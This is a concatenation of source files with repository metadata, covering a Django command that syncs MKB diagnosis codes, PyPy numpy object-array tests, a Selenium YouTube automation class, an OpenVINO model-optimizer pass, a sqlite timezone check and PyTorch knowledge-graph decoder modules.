lagtc[vox, :],
inittc,
rt_floatset=rt_floatset,
                    rt_floattype=rt_floattype,
)
volumetotal += 1
return volumetotal
| 31.092857
| 92
| 0.526074
|
4a18f8f40f820f78081d0a7c9d8d5715d3343689
| 2,023
|
py
|
Python
|
rmis_integration/management/commands/rmis_get_mkb.py
|
Wellheor1/l2
|
d980210921c545c68fe9d5522bb693d567995024
|
[
"MIT"
] | 10
|
2018-03-14T06:17:06.000Z
|
2022-03-10T05:33:34.000Z
|
rmis_integration/management/commands/rmis_get_mkb.py
|
Wellheor1/l2
|
d980210921c545c68fe9d5522bb693d567995024
|
[
"MIT"
] | 512
|
2018-09-10T07:37:34.000Z
|
2022-03-30T02:23:43.000Z
|
rmis_integration/management/commands/rmis_get_mkb.py
|
D00dleman/l2
|
0870144537ee340cd8db053a608d731e186f02fb
|
[
"MIT"
] | 24
|
2018-07-31T05:52:12.000Z
|
2022-02-08T00:39:41.000Z
|
from django.core.management import BaseCommand
from rmis_integration.client import Client as RC
from directions.models import Diagnoses
class Command(BaseCommand):
help = "Получение справочника МКБ"
def handle(self, *args, **options):
c = RC()
request_data = {
"refbookCode": "1.2.643.5.1.13.3.1058506043530.1.1.5",
"version": "CURRENT",
}
count_parts = c.get_client("path_directory").service.getRefbookParts(**request_data)
for i in range(count_parts):
request_data['partNumber'] = i + 1
mkb_part = c.get_client("path_directory").service.getRefbookPartial(**request_data)
for m in mkb_part:
data = m['column']
code, name, rmis_id = '', '', ''
m_type = 1
for j in data:
if j['name'] == 'CODE':
code = j['data']
if j['name'] == 'NAME':
name = j['data']
if j['name'] == 'ID':
rmis_id = j['data']
if j['name'] == 'HAS_CHILD':
if j['data'] == 'true':
m_type = 1
else:
m_type = 2
if "-" in code:
continue
diag = Diagnoses.objects.filter(code=code).first()
if diag:
if diag.title != name:
diag.title = name
if rmis_id and diag.rmis_id != rmis_id:
diag.rmis_id = rmis_id
diag.m_type = m_type
diag.save()
print(f"обновлено: {code}-{name}-{m_type}") # noqa: T001
if diag is None:
Diagnoses(code=code, title=name, m_type=m_type, d_type='mkb10.4', rmis_id=rmis_id).save()
print(f"создано: {code}-{name}-{m_type}") # noqa: T001
| 39.666667
| 109
| 0.454276
|
4a18f9fa4aef8e90594cb8be86006b39b98d6633
| 6,902
|
py
|
Python
|
pypy/module/micronumpy/test/test_object_arrays.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 381
|
2018-08-18T03:37:22.000Z
|
2022-02-06T23:57:36.000Z
|
pypy/module/micronumpy/test/test_object_arrays.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 16
|
2018-09-22T18:12:47.000Z
|
2022-02-22T20:03:59.000Z
|
pypy/module/micronumpy/test/test_object_arrays.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
from pypy.module.micronumpy.test.test_base import BaseNumpyAppTest
from pypy.conftest import option
class AppTestObjectDtypes(BaseNumpyAppTest):
spaceconfig = dict(usemodules=["micronumpy", "struct", "binascii"])
def setup_class(cls):
BaseNumpyAppTest.setup_class.im_func(cls)
cls.w_runappdirect = cls.space.wrap(option.runappdirect)
def test_scalar_from_object(self):
from numpy import array
import sys
class Polynomial(object):
def whatami(self):
return 'an object'
a = array(Polynomial())
assert a.shape == ()
assert a.sum().whatami() == 'an object'
def test_uninitialized_object_array_is_filled_by_None(self):
import numpy as np
a = np.ndarray([5], dtype="O")
assert a[0] == None
def test_object_arrays_add(self):
import numpy as np
a = np.array(["foo"], dtype=object)
b = np.array(["bar"], dtype=object)
raises(TypeError, np.add, a, 1)
res = a + b
assert res[0] == "foobar"
def test_bool_func(self):
import numpy as np
a = np.array(["foo"], dtype=object)
b = a and complex(1, -1)
assert b == complex(1, -1)
b = np.array(complex(1, -1)) and a
assert (b == a).all()
c = np.array([1, 2, 3])
assert (a[0] != c[0])
assert (c[0] != a[0])
assert (a[0] > c[0])
assert (not a[0] < c[0])
assert (c[0] < a[0])
assert (not c[0] > a[0])
def test_logical_ufunc(self):
import numpy as np
import sys
a = np.array(["foo"], dtype=object)
b = np.array([1], dtype=object)
d = np.array([complex(1, 10)], dtype=object)
c = np.logical_and(a, 1)
assert c.dtype == np.dtype('object')
assert c == 1
c = np.logical_and(b, complex(1, -1))
assert c.dtype == np.dtype('object')
assert c == complex(1, -1)
c = np.logical_and(d, b)
assert c == 1
c = b & 1
assert c.dtype == np.dtype('object')
assert (c == 1).all()
c = np.array(1) & b
assert (c == b).all()
def test_reduce(self):
import numpy as np
class O(object):
def whatami(self):
return 'an object'
fiveOs = [O()] * 5
a = np.array(fiveOs, dtype=object)
print np.maximum
b = np.maximum.reduce(a)
assert b is not None
def test_complex_op(self):
import numpy as np
import sys
a = np.array(['abc', 'def'], dtype=object)
b = np.array([1, 2, 3], dtype=object)
c = np.array([complex(1, 1), complex(1, -1)], dtype=object)
for arg in (a,b,c):
assert (arg == np.real(arg)).all()
assert (0 == np.imag(arg)).all()
if '__pypy__' in sys.builtin_module_names:
skip('not implemented yet')
raises(AttributeError, np.conj, a)
res = np.conj(b)
assert (res == b).all()
res = np.conj(c)
assert res[0] == c[1] and res[1] == c[0]
def test_keep_object_alive(self):
# only translated does it really test the gc
import numpy as np
import gc
class O(object):
def whatami(self):
return 'an object'
fiveOs = [O()] * 5
a = np.array(fiveOs, dtype=object)
del fiveOs
gc.collect()
assert a[2].whatami() == 'an object'
def test_array_interface(self):
import numpy as np
class DummyArray(object):
def __init__(self, interface, base=None):
self.__array_interface__ = interface
self.base = base
a = np.array([(1, 2, 3)], dtype='u4,u4,u4')
b = np.array([(1, 2, 3), (4, 5, 6), (7, 8, 9)], dtype='u4,u4,u4')
interface = dict(a.__array_interface__)
interface['shape'] = tuple([3])
interface['strides'] = tuple([0])
c = np.array(DummyArray(interface, base=a))
c.dtype = a.dtype
#print c
assert (c == np.array([(1, 2, 3), (1, 2, 3), (1, 2, 3)], dtype='u4,u4,u4') ).all()
def test_for_object_scalar_creation(self):
import numpy as np
import sys
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.array([None])[0]
assert a is None
assert type(b) is int
assert type(b2) is float
assert type(c) is np.ndarray
assert c.dtype == object
assert type(d) is type(None)
if '__pypy__' in sys.builtin_module_names:
skip('not implemented yet')
e = np.object_([None, {}, []])
assert e.dtype == object
def test_mem_array_creation_invalid_specification(self):
# while not specifically testing object dtype, this
# test segfaulted during ObjectType.store due to
# missing gc hooks
import numpy as np
import sys
ytype = np.object_
if '__pypy__' in sys.builtin_module_names:
dt = np.dtype([('x', int), ('y', ytype)])
x = np.empty((4, 0), dtype = dt)
raises(NotImplementedError, x.__getitem__, 'y')
ytype = str
dt = np.dtype([('x', int), ('y', ytype)])
# Correct way
a = np.array([(1, 'object')], dt)
# Wrong way - should complain about writing buffer to object dtype
raises(ValueError, np.array, [1, 'object'], dt)
def test_astype(self):
import numpy as np
a = np.array([b'a' * 100], dtype='O')
assert 'a' * 100 in str(a)
b = a.astype('S')
assert b.dtype == 'S100'
assert 'a' * 100 in str(b)
a = np.array([u'a' * 100], dtype='O')
assert 'a' * 100 in str(a)
b = a.astype('U')
assert b.dtype == 'U100'
assert 'a' * 100 in str(b)
a = np.array([123], dtype='U')
assert a[0] == u'123'
b = a.astype('O')
assert b[0] == u'123'
assert type(b[0]) is unicode
class MyFloat(object):
def __float__(self):
return 1.0
a = np.array([MyFloat()])
assert a.shape == (1,)
assert a.dtype == np.object_
b = a.astype(float)
assert b.shape == (1,)
assert b.dtype == np.float_
assert (b == 1.0).all()
def test__reduce__(self):
from numpy import arange, dtype
from cPickle import loads, dumps
import sys
a = arange(15).astype(object)
if '__pypy__' in sys.builtin_module_names:
raises(NotImplementedError, dumps, a)
skip('not implemented yet')
b = loads(dumps(a))
assert (a == b).all()
a = arange(15).astype(object).reshape((3, 5))
b = loads(dumps(a))
assert (a == b).all()
| 32.102326
| 90
| 0.526079
|
4a18f9fdd13e11f7657149b004abedeff2767615
| 7,991
|
py
|
Python
|
Youtube/youtube.py
|
rishabhjainfinal/selenium-automations
|
3928e8d1722eb7e8339e782b95c160604d181117
|
[
"MIT"
] | null | null | null |
Youtube/youtube.py
|
rishabhjainfinal/selenium-automations
|
3928e8d1722eb7e8339e782b95c160604d181117
|
[
"MIT"
] | 1
|
2021-03-21T21:04:07.000Z
|
2021-03-21T21:04:07.000Z
|
Youtube/youtube.py
|
rishabhjainfinal/selenium-automations
|
3928e8d1722eb7e8339e782b95c160604d181117
|
[
"MIT"
] | 2
|
2021-03-21T20:54:04.000Z
|
2021-03-21T22:52:15.000Z
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import time
import os
class youtube:
"""This module is use for automation of youtube threw sekenium webdriver
this module is only for youtube
for this module you need latest webdriver in same directory as progarm
just check you browser version
if you don't get the driver then link are;'
[crome = https://chromedriver.chromium.org/downloads]
[Edge = https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/ ] """
def __init__(self,email,password,browser = 'Edge' ):
        '''Take email, password and browser (Chrome or Edge); the URL is fixed to YouTube.'''
print("running ")
self.user = email
self.password = password
        if browser == 'Chrome':
            self.driver = webdriver.Chrome(r'D:\selenium automation\youtube automation\chromedriver.exe')
            print("using [ Chrome ] browser")
else :
try:
                self.driver = webdriver.Edge(r'D:\selenium automation\youtube automation\edge_old.exe')  # msedgedriver.exe
            except:
                self.driver = webdriver.Edge(r'D:\selenium automation\youtube automation\msedgedriver.exe')
print("using [ Edge ] browser")
self.driver.maximize_window()
print("initialising the process ")
def geturl(self,url='https://www.youtube.com/'):
        '''Open the provided URL and dismiss any notification box on the window.'''
driver = self.driver
print("opening url",url)
driver.get(url)
# print("url open")
time.sleep(2)
try:
driver.find_element_by_xpath("//*[@aria-label='Dismiss']").click()
print("trying eleminating notification box # ")
print("done")
time.sleep(5)
except :
pass
def signing(self):
        '''Sign in to YouTube with the stored email and password;
        can only be used after geturl has exposed the login option.'''
driver = self.driver
print("signing")
time.sleep(5)
signi = '''//a[@href ='https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252F&hl=en&ec=65620']'''
driver.find_element_by_xpath(signi).click()
print("clicked on signi")
time.sleep(3)
try:
email = driver.find_element_by_xpath("//input[@id = 'identifierId']").send_keys(self.user)
nextB = driver.find_element_by_xpath("//*[text()= 'Next']")
nextB.click()
except:
email = driver.find_element_by_xpath("//input[@id = 'identifierId']").send_keys(self.user)
nextB = driver.find_element_by_xpath("//*[text()= 'Next']")
nextB.click()
time.sleep(5)
print("trying given password ")
passw = driver.find_element_by_xpath("//input[@type= 'password']").send_keys(self.password)
try:
driver.find_element_by_xpath("//*[text()= 'Next']").click()
time.sleep(5)
except :
print()
print("error founded trying again")
time.sleep(5)
#print("trying given password ")
#assw = driver.find_element_by_xpath("//input[@type= 'password']").send_keys(self.password)
driver.find_element_by_xpath("//*[text()= 'Next']").click()
time.sleep(5)
global result
try:
try:
result ='@@@@@@@@@@\n'+driver.find_element_by_xpath("//div[@jsname='B34EJ']/span").text+'\n@@@@@@@@@@@@@@@@@@@\n error found \n'
print(result)
driver.close()
except :
if driver.current_url=='''https://accounts.google.com/signin/v2/identifier?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252F&hl=en&ec=65620&flowName=GlifWebSignIn&flowEntry=ServiceLogin&cid=1&navigationDirection=forward''':
                    result = 'error found\nyour browser may not be considered secure'
print(result)
driver.close()
finally:
return result
except :
result="login sucessfully :-:"
print(result)
return result
time.sleep(3)
try:
driver.find_element_by_xpath("//*[@aria-label='Dismiss']").click()
print("trying eleminating notification box # ")
print("done")
except :
pass
def find_video(self):
        '''Find a video or channel by name or URL, taken from interactive input.'''
driver = self.driver
que = input("have any\n 1.[name] or\n 2.[url] to find write 1/2 :")
if que == 1:
find = input("write name of [video] or [chanal] :_: :")
driver.get(f"https://www.youtube.com/results?search_query={find}")
else:
find = input("enter url that you have")
driver.get(find)
def like(self,url):
        '''Like a video given its URL.'''
driver = self.driver
time.sleep(2)
print('now opening ',url)
driver.get(url)
time.sleep(3)
p="//div[@id='top-level-buttons']//a//yt-formatted-string[@id='text'][@aria-label]"
a=driver.find_element_by_xpath(p).get_attribute('aria-label')
a= a.split(' ')[0]
print(f"there are total {a} likes already")
try:
like = driver.find_element_by_xpath(f'''//div[@id="top-level-buttons"]//a//button[@aria-label="like this video along with {a} other people"]''')
b = like.get_attribute('aria-pressed')
#true= liked.false unliked
if b == 'true' :
print("video already liked")
else :
print("try to like")
like.click()
print("video liked @@@")
except :
print("not working\n retry loging again ")
def subscribe(self):
        '''Subscribe to the channel of the currently open video.
        Limitation: a video must already be open;
        good to use in a loop.'''
driver = self.driver
time.sleep(1)
try :
subs = driver.find_element_by_xpath("//div[@id='subscribe-button' and @class='style-scope ytd-video-secondary-info-renderer']//paper-button/yt-formatted-string")
print(subs.text)
            if subs.text != 'SUBSCRIBED':
                print("NOT subscribed yet, trying :: ")
subs.click()
sub = "Subscribed @@@"
else :
sub = "already subscribed"
return sub
        except NoSuchElementException:
            print("element not found")
def commenting(self,comment):
        '''Comment on a video.
        Limitation: the URL should already be open.'''
driver = self.driver
time.sleep(2)
        # driver.execute_script("window.scrollTo(0,document.body.scrollHeight)")
# print(" scrolling ")
try:
for i in range(1):
driver.execute_script("arguments[0].scrollIntoView();",driver.find_element_by_xpath('//div[@id="continuations"and @class="style-scope ytd-item-section-renderer"]'))
print('scrolling ',1)
time.sleep(2)
try:
com = driver.find_element_by_xpath('//div[@id="placeholder-area"]')
com.click()
com.send_keys(comment)
except:
com = driver.find_element_by_xpath("//div[@id='contenteditable-root']")
com.click()
com.send_keys(comment)
time.sleep(1)
send =driver.find_element_by_xpath("//paper-button[@aria-label = 'Comment']")
send.click()
# print('done')
except:
print("unable to comment")
def scrole_page_and_video_links(self):
        '''Collect every video link on the page into a global list variable;
        the page should already be open.'''
global url
driver=self.driver
time.sleep(5)
for i in range(5):
driver.execute_script("arguments[0].scrollIntoView();",driver.find_element_by_xpath('//div[@id="continuations"and @class="style-scope ytd-item-section-renderer"]'))
# print("scrolling into window wait <> ")
time.sleep(2)
# print()
url = [i.get_attribute('href') for i in driver.find_elements_by_xpath("//a[@id='thumbnail'][@href]")]
print(f"total {len(url)} videos founded @@")
return url
def close_end(self):
        '''Just close the driver at the end.'''
driver = self.driver
time.sleep(5)
driver.close()
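# Usage sketch (hypothetical credentials and video id):
#     yt = youtube('user@example.com', 'password', browser='Edge')
#     yt.geturl()
#     yt.signing()
#     yt.like('https://www.youtube.com/watch?v=VIDEO_ID')
#     yt.close_end()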
| 28.744604
| 369
| 0.650732
|
4a18fa450d5b391cafa7409532cf18b7eb13ab69
| 1,116
|
py
|
Python
|
model-optimizer/extensions/back/ParameterToPlaceholder.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 3
|
2020-02-09T23:25:37.000Z
|
2021-01-19T09:44:12.000Z
|
model-optimizer/extensions/back/ParameterToPlaceholder.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/extensions/back/ParameterToPlaceholder.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 2
|
2020-04-18T16:24:39.000Z
|
2021-01-19T09:42:19.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.back.replacement import BackReplacementPattern
from mo.graph.graph import Graph
class ParameterToInput(BackReplacementPattern):
enabled = True
graph_condition = [lambda graph: not graph.graph['cmd_params'].generate_experimental_IR_V10]
def pattern(self):
return dict(
nodes=[
('parameter', dict(kind='op', type='Parameter'))
],
edges=[]
)
def replace_pattern(self, graph: Graph, match: dict):
match['parameter']['type'] = 'Input'
| 31.885714
| 96
| 0.701613
|
4a18facd538f03698c2f07a9682cda569b9d2b55
| 397
|
py
|
Python
|
Using_Database_in_Python/Transaction_timing/11_tzcheck.py
|
ajeyln/python_scripts_udemy
|
387a027170207a12daf16c25a9592adb27e45870
|
[
"MIT"
] | null | null | null |
Using_Database_in_Python/Transaction_timing/11_tzcheck.py
|
ajeyln/python_scripts_udemy
|
387a027170207a12daf16c25a9592adb27e45870
|
[
"MIT"
] | null | null | null |
Using_Database_in_Python/Transaction_timing/11_tzcheck.py
|
ajeyln/python_scripts_udemy
|
387a027170207a12daf16c25a9592adb27e45870
|
[
"MIT"
] | null | null | null |
import sqlite3
import pytz
import pickle
db = sqlite3.connect("accounts.sqlite",detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
utc_time = row[0]
    pickled_zone = row[3]
    zone = pickle.loads(pickled_zone)
local_time = pytz.utc.localize(utc_time).astimezone(zone)
print("{}\t{}\t{}".format(utc_time, local_time, local_time.tzinfo))
db.close()
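# Note: detect_types=sqlite3.PARSE_DECLTYPES makes sqlite3 run its registered
# converters on declared column types, so a TIMESTAMP column comes back as a
# datetime.datetime rather than a plain string.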
| 30.538462
| 77
| 0.720403
|
4a18fd621151a9b74a54a2f22ff515ada00b135a
| 23,568
|
py
|
Python
|
graphqa/netquery/decoders.py
|
gengchenmai/se-kge
|
0e5a630a8403d4c7965de0f71e2e22b95f7be7bd
|
[
"Apache-2.0"
] | 9
|
2020-06-17T06:16:55.000Z
|
2021-11-18T10:35:15.000Z
|
graphqa/netquery/decoders.py
|
gengchenmai/se-kge
|
0e5a630a8403d4c7965de0f71e2e22b95f7be7bd
|
[
"Apache-2.0"
] | 1
|
2020-08-12T15:18:52.000Z
|
2020-08-13T01:06:36.000Z
|
graphqa/netquery/decoders.py
|
gengchenmai/se-kge
|
0e5a630a8403d4c7965de0f71e2e22b95f7be7bd
|
[
"Apache-2.0"
] | 3
|
2020-08-27T23:53:35.000Z
|
2021-06-29T06:33:31.000Z
|
import torch
import torch.nn as nn
from torch.nn import init
import numpy as np
import torch.nn.functional as F
"""
A set of decoder modules.
Each decoder takes pairs of embeddings and predicts relationship scores given these embeddings.
"""
"""
*Edge decoders*
For all edge decoders, the forward method returns a simple relationship score,
i.e. the likelihood of an edge, between a pair of nodes.
"""
class CosineEdgeDecoder(nn.Module):
"""
Simple decoder where the relationship score is just the cosine
similarity between the two embeddings.
Note: this does not distinguish between edges types
"""
def __init__(self):
super(CosineEdgeDecoder, self).__init__()
self.cos = nn.CosineSimilarity(dim=0)
def forward(self, embeds1, embeds2, rel):
# cosine, the larger, the better
return self.cos(embeds1, embeds2)
class DotProductEdgeDecoder(nn.Module):
"""
Simple decoder where the relationship score is just the dot product
between the embeddings (i.e., unnormalized version of cosine)
Note: this does not distinguish between edges types
"""
def __init__(self):
super(DotProductEdgeDecoder, self).__init__()
def forward(self, embeds1, embeds2, rel):
dots = torch.sum(embeds1 * embeds2, dim=0)
return dots
class BilinearEdgeDecoder(nn.Module):
"""
Decoder where the relationship score is given by a bilinear form
between the embeddings (i.e., one learned matrix per relationship type).
"""
def __init__(self, relations, dims):
super(BilinearEdgeDecoder, self).__init__()
self.relations = relations
self.mats = {}
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.mats[rel] = nn.Parameter(
torch.FloatTensor(dims[rel[0]], dims[rel[2]]))
init.xavier_uniform(self.mats[rel])
self.register_parameter("_".join(rel), self.mats[rel])
def forward(self, embeds1, embeds2, rel):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
acts = embeds1.t().mm(self.mats[rel])
return self.cos(acts.t(), embeds2)
class TransEEdgeDecoder(nn.Module):
"""
Decoder where the relationship score is given by translation of
the embeddings (i.e., one learned vector per relationship type).
"""
def __init__(self, relations, dims):
super(TransEEdgeDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
def forward(self, embeds1, embeds2, rel):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
trans_embed = embeds1 + self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds1.size(1))
trans_dist = (trans_embed - embeds2).pow(2).sum(0)
# trans_dist shape: [batch_size]
# TransE distance, the smaller, the better
return -trans_dist
class BilinearDiagEdgeDecoder(nn.Module):
"""
Decoder where the relationship score is given by a bilinear form
between the embeddings (i.e., one learned diagonal matrix per relationship type).
"""
def __init__(self, relations, dims):
super(BilinearDiagEdgeDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
def forward(self, embeds1, embeds2, rel):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
acts = (embeds1*self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds1.size(1))*embeds2).sum(0)
return acts
"""
*Metapath decoders*
For all metapath decoders, the forward method returns a compositional relationship score,
i.e. the likelihood of a compositional relationship or metapath, between a pair of nodes.
"""
class BilinearMetapathDecoder(nn.Module):
"""
Each edge type is represented by a matrix, and
    compositional relationships are a product of matrices.
"""
def __init__(self, relations, dims):
'''
Args:
relations: a dict() of all triple templates
key: domain entity type
value: a list of tuples (range entity type, predicate)
dims: a dict(), node type => embed_dim of node embedding
'''
super(BilinearMetapathDecoder, self).__init__()
self.relations = relations
self.mats = {}
self.sigmoid = torch.nn.Sigmoid()
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.mats[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]], dims[rel[2]]))
init.xavier_uniform(self.mats[rel])
self.register_parameter("_".join(rel), self.mats[rel])
def forward(self, embeds1, embeds2, rels):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
rels: a list of triple templates, a n-length metapath
'''
act = embeds1.t()
for i_rel in rels:
act = act.mm(self.mats[i_rel])
act = self.cos(act.t(), embeds2)
return act
def project(self, embeds, rel):
'''
embeds shape: [embed_dim, batch_size]
rel: triple template
'''
return self.mats[rel].mm(embeds)
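# Usage sketch (hypothetical schema): `relations` maps a domain type to
# (range type, predicate) tuples and `dims` gives each type's embed dim, e.g.
#     relations = {'place': [('place', 'near')]}
#     dims = {'place': 64}
#     dec = BilinearMetapathDecoder(relations, dims)
#     scores = dec(embeds1, embeds2, [('place', 'near', 'place')])  # [batch_size]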
class BilinearBlockDiagMetapathDecoder(nn.Module):
"""
This is only used for enc_agg_func == "concat"
    Each edge type is represented by two matrices:
    1) a feature matrix for the node feature embed
    2) a position matrix for the node position embed
    Together they can be seen as one block-diagonal matrix;
    compositional relationships are a product of matrices.
"""
def __init__(self, relations, dims, feat_dims, spa_embed_dim):
'''
Args:
relations: a dict() of all triple templates
key: domain entity type
value: a list of tuples (range entity type, predicate)
dims: a dict(), node type => embed_dim of node embedding
feat_dims: a dict(), node type => embed_dim of feature embedding
spa_embed_dim: the embed_dim of position embedding
'''
super(BilinearBlockDiagMetapathDecoder, self).__init__()
self.relations = relations
self.dims = dims
self.feat_dims = feat_dims
self.spa_embed_dim = spa_embed_dim
self.feat_mats = {}
self.pos_mats = {}
self.sigmoid = torch.nn.Sigmoid()
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.feat_mats[rel] = nn.Parameter(torch.FloatTensor(feat_dims[rel[0]], feat_dims[rel[2]]))
init.xavier_uniform(self.feat_mats[rel])
self.register_parameter("feat-"+"_".join(rel), self.feat_mats[rel])
self.pos_mats[rel] = nn.Parameter(torch.FloatTensor(spa_embed_dim, spa_embed_dim))
init.xavier_uniform(self.pos_mats[rel])
self.register_parameter("pos-"+"_".join(rel), self.pos_mats[rel])
def forward(self, embeds1, embeds2, rels):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
rels: a list of triple templates, a n-length metapath
'''
# act: [batch_size, embed_dim]
act = embeds1.t()
feat_act, pos_act = torch.split(act,
[self.feat_dims[rels[0][0]],self.spa_embed_dim], dim=1)
for i_rel in rels:
feat_act = feat_act.mm(self.feat_mats[i_rel])
pos_act = pos_act.mm(self.pos_mats[i_rel])
# act: [batch_size, embed_dim]
act = torch.cat([feat_act, pos_act], dim=1)
act = self.cos(act.t(), embeds2)
return act
def project(self, embeds, rel):
'''
embeds shape: [embed_dim, batch_size]
rel: triple template
'''
feat_act, pos_act = torch.split(embeds.t(),
[self.feat_dims[rel[0]],self.spa_embed_dim], dim=1)
feat_act = feat_act.mm(self.feat_mats[rel])
pos_act = pos_act.mm(self.pos_mats[rel])
act = torch.cat([feat_act, pos_act], dim=1)
return act.t()
class BilinearBlockDiagPos2FeatMatMetapathDecoder(nn.Module):
"""
This is only used for enc_agg_func == "concat"
    Each edge type is represented by two matrices:
    1) a feature matrix for the node feature embed
    2) a position matrix for the node position embed
    Together they can be seen as one block-diagonal matrix;
    compositional relationships are a product of matrices.
"""
def __init__(self, relations, dims, feat_dims, spa_embed_dim):
'''
Args:
relations: a dict() of all triple templates
key: domain entity type
value: a list of tuples (range entity type, predicate)
dims: a dict(), node type => embed_dim of node embedding
feat_dims: a dict(), node type => embed_dim of feature embedding
spa_embed_dim: the embed_dim of position embedding
'''
super(BilinearBlockDiagPos2FeatMatMetapathDecoder, self).__init__()
self.relations = relations
self.dims = dims
self.feat_dims = feat_dims
self.spa_embed_dim = spa_embed_dim
self.feat_mats = {}
self.pos_mats = {}
self.pos2feat_mats = {}
self.sigmoid = torch.nn.Sigmoid()
self.cos = nn.CosineSimilarity(dim=0)
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.feat_mats[rel] = nn.Parameter(torch.FloatTensor(feat_dims[rel[0]], feat_dims[rel[2]]))
init.xavier_uniform(self.feat_mats[rel])
self.register_parameter("feat-"+"_".join(rel), self.feat_mats[rel])
self.pos_mats[rel] = nn.Parameter(torch.FloatTensor(spa_embed_dim, spa_embed_dim))
init.xavier_uniform(self.pos_mats[rel])
self.register_parameter("pos-"+"_".join(rel), self.pos_mats[rel])
self.pos2feat_mats[rel] = nn.Parameter(torch.FloatTensor(spa_embed_dim, feat_dims[rel[2]]))
init.xavier_uniform(self.pos2feat_mats[rel])
self.register_parameter("pos2feat-"+"_".join(rel), self.pos2feat_mats[rel])
def forward(self, embeds1, embeds2, rels, do_spa_sem_lift = False):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
rels: a list of triple templates, a n-length metapath
do_spa_sem_lift: whether to do pos embed to feat embed prediction
'''
# act: [batch_size, embed_dim]
act = embeds1.t()
if do_spa_sem_lift:
# make sure the input is a pos_embed
assert act.size()[1] == self.spa_embed_dim
# act: [batch_size, spa_embed_dim]
rel = rels[0]
# feat_act: [batch_size, embed_dim]
feat_act = act.mm(self.pos2feat_mats[rel])
# pos_act: [batch_size, spa_embed_dim]
pos_act = act.mm(self.pos_mats[rel])
for i_rel in rels[1:]:
feat_act = feat_act.mm(self.feat_mats[i_rel])
pos_act = pos_act.mm(self.pos_mats[i_rel])
else:
feat_act, pos_act = torch.split(act,
[self.feat_dims[rels[0][0]],self.spa_embed_dim], dim=1)
for i_rel in rels:
feat_act = feat_act.mm(self.feat_mats[i_rel])
pos_act = pos_act.mm(self.pos_mats[i_rel])
# act: [batch_size, embed_dim+spa_embed_dim]
act = torch.cat([feat_act, pos_act], dim=1)
act = self.cos(act.t(), embeds2)
return act
def project(self, embeds, rel, do_spa_sem_lift = False):
'''
embeds shape: [embed_dim, batch_size]
rel: triple template
do_spa_sem_lift: whether to do pos embed to feat embed prediction
'''
# act: [batch_size, embed_dim]
act = embeds.t()
if do_spa_sem_lift:
# make sure the input is a pos_embed
assert act.size()[1] == self.spa_embed_dim
# feat_act: [batch_size, embed_dim]
feat_act = act.mm(self.pos2feat_mats[rel])
# pos_act: [batch_size, spa_embed_dim]
pos_act = act.mm(self.pos_mats[rel])
else:
feat_act, pos_act = torch.split(act,
[self.feat_dims[rel[0]],self.spa_embed_dim], dim=1)
feat_act = feat_act.mm(self.feat_mats[rel])
pos_act = pos_act.mm(self.pos_mats[rel])
act = torch.cat([feat_act, pos_act], dim=1)
return act.t()
